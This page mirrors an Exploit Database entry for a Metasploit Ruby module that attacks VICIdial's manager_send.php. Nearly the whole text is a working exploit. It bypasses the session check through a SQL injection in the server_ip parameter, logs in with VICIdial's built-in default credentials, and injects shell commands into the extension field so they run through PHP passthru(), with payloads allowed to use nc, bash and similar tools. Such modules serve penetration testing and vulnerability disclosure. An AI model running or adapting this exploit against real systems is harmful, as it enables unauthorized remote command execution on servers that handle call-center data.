VICIdial Manager – Send OS Command Injection (Metasploit)

• Exploit Database
• 105 阅读

• 作者： Metasploit
  日期： 2013-11-08
• 类别：

  • remote
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/29513/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201

  ## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##   require &apos;msf/core&apos;   class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking   include Msf::Exploit::Remote::HttpClient   def initialize(info = {}) super(update_info(info, &apos;Name&apos;=> &apos;VICIdial Manager Send OS Command Injection&apos;, &apos;Description&apos; => %q{ The file agc/manager_send.php in the VICIdial web application uses unsanitized user input as part of a command that is executed using the PHP passthru() function. A valid username, password and session are needed to access the injection point. Fortunately, VICIdial has two built-in accounts with default passwords and the manager_send.php file has a SQL injection vulnerability that can be used to bypass the session check as long as at least one session has been created at some point in time. In case there isn&apos;t any valid session, the user can provide astGUIcient credentials in order to create one. The results of the injected command are returned as part of the response from the web server. Affected versions include 2.7RC1, 2.7, and 2.8-403a. Other versions are likely affected as well. The default credentials used by Vicidial are VDCL/donotedit and VDAD/donotedit. }, &apos;Author&apos;=> [ &apos;Adam Caudill <adam@adamcaudill.com>&apos;, # Vulnerability discovery &apos;AverageSecurityGuy <stephen@averagesecurityguy.info>&apos;, # Metasploit Module &apos;sinn3r&apos;, # Metasploit module &apos;juan vazquez&apos; # Metasploit module ], &apos;License&apos; => MSF_LICENSE, &apos;References&apos;=> [ [ &apos;CVE&apos;, &apos;2013-4467&apos; ], [ &apos;CVE&apos;, &apos;2013-4468&apos; ], [ &apos;OSVDB&apos;, &apos;98903&apos; ], [ &apos;OSVDB&apos;, &apos;98902&apos; ], [ &apos;BID&apos;, &apos;63340&apos; ], [ &apos;BID&apos;, &apos;63288&apos; ], [ &apos;URL&apos;, &apos;http://www.openwall.com/lists/oss-security/2013/10/23/10&apos; ], [ &apos;URL&apos;, &apos;http://adamcaudill.com/2013/10/23/vicidial-multiple-vulnerabilities/&apos; ] ], &apos;DisclosureDate&apos; => &apos;Oct 23 2013&apos;, &apos;Privileged&apos; => true, &apos;Platform&apos; => [&apos;unix&apos;], &apos;Payload&apos;=> { &apos;DisableNops&apos; => true, &apos;Space&apos; => 8000, # Apache&apos;s limit for GET, it should be enough one to fit any payload &apos;Compat&apos;=> { &apos;PayloadType&apos; => &apos;cmd&apos;, # Based on vicibox availability of binaries &apos;RequiredCmd&apos; => &apos;generic perl python awk bash telnet nc openssl&apos;, } }, &apos;Targets&apos;=> [ [ &apos;CMD&apos;, { &apos;Arch&apos; => ARCH_CMD, &apos;Platform&apos; => &apos;unix&apos; } ] ], &apos;DefaultTarget&apos;=> 0 ))   register_options( [ OptString.new(&apos;USERNAME&apos;,[true, &apos;VICIdial Username&apos;, &apos;VDCL&apos;]), OptString.new(&apos;PASSWORD&apos;,[true, &apos;VICIdial Password&apos;, &apos;donotedit&apos;]), OptString.new(&apos;USER_ASTGUI&apos;, [false, &apos;astGUIcient User Login&apos;, &apos;6666&apos;]), OptString.new(&apos;PASS_ASTGUI&apos;, [false, &apos;astGUIcient User Password&apos;, &apos;1234&apos;]), OptString.new(&apos;PHONE_USER_ASTGUI&apos;, [false, &apos;astGUIcient Phone Login&apos;, &apos;6666&apos;]), OptString.new(&apos;PHONE_PASSWORD_ASTGUI&apos;, [false, &apos;astGUIcient Phone Password&apos;, &apos;1234&apos;]) ], self.class) end   # Login through astGUIclient and create a web_client_sessions if there isn&apos;t # something available def login begin res = send_request_cgi({ &apos;uri&apos; => &apos;/agc/astguiclient.php&apos;, &apos;method&apos;=> &apos;POST&apos;, &apos;vars_post&apos; => { "user"=> datastore["USER_ASTGUI"], "pass"=> datastore["PASS_ASTGUI"], "phone_login" => datastore["PHONE_USER_ASTGUI"], "phone_pass"=> datastore["PHONE_PASSWORD_ASTGUI"] } }) rescue ::Rex::ConnectionError vprint_error("#{rhost}:#{rport} - Failed to connect to the web server") return nil end   return res end   def astguiclient_creds? if datastore["USER_ASTGUI"].nil? or datastore["USER_ASTGUI"].empty? return false end   if datastore["PASS_ASTGUI"].nil? or datastore["PASS_ASTGUI"].empty? return false end   if datastore["PHONE_USER_ASTGUI"].nil? or datastore["PHONE_USER_ASTGUI"].empty? return false end   if datastore["PHONE_PASSWORD_ASTGUI"].nil? or datastore["PHONE_PASSWORD_ASTGUI"].empty? return false end   return true end   def request(cmd, timeout = 20) begin res = send_request_cgi({ &apos;uri&apos;=> &apos;/agc/manager_send.php&apos;, &apos;method&apos; => &apos;GET&apos;, &apos;vars_get&apos; => { "enable_sipsak_messages" => "1", "allow_sipsak_messages"=> "1", "protocol" => "sip", "ACTION" => "OriginateVDRelogin", "session_name" => rand_text_alpha(12), # Random session name "server_ip"=> "&apos; OR &apos;1&apos; = &apos;1", # SQL Injection to validate the session "extension"=> ";#{cmd};", "user" => datastore[&apos;USERNAME&apos;], "pass" => datastore[&apos;PASSWORD&apos;] } }, timeout) rescue ::Rex::ConnectionError vprint_error("#{rhost}:#{rport} - Failed to connect to the web server") return nil end   return res end   def check res = request(&apos;ls -a .&apos;)   if res and res.code == 200 if res.body =~ /Invalid Username\/Password/ vprint_error("#{peer} - Invalid Username or Password.") return Exploit::CheckCode::Detected elsif res.body =~ /Invalid session_name/ vprint_error("#{peer} - Web client session not found") return Exploit::CheckCode::Detected elsif res.body =~ /\.\n\.\.\n/m return Exploit::CheckCode::Vulnerable end end   return Exploit::CheckCode::Unknown end   def exploit print_status("#{peer} - Checking if injection is possible...") res = request(&apos;ls -a .&apos;)   unless res and res.code == 200 fail_with(Failure::Unknown - "#{peer} - Unknown response, check the target") end   if res.body =~ /Invalid Username\/Password/ fail_with(Failure::NoAccess - "#{peer} - Invalid VICIdial credentials, check USERNAME and PASSWORD") end   if res.body =~ /Invalid session_name/ fail_with(Failure::NoAccess, "#{peer} - Valid web client session not found, provide astGUI or wait until someone logins") unless astguiclient_creds? print_error("#{peer} - Valid web client session not found, trying to create one...") res = login unless res and res.code == 200 and res.body =~ /you are logged/ fail_with(Failure::NoAccess, "#{peer} - Invalid astGUIcient credentials, check astGUI credentials or wait until someone login.") end res = request(&apos;ls -a .&apos;) end   unless res and res.code == 200 and res.body =~ /\.\n\.\.\n/m fail_with(Failure::NotVulnerable, "#{peer} - Injection hasn&apos;t been possible") end   print_good("#{peer} - Exploitation looks feasible, proceeding... ") request("#{payload.encoded}", 1) end   end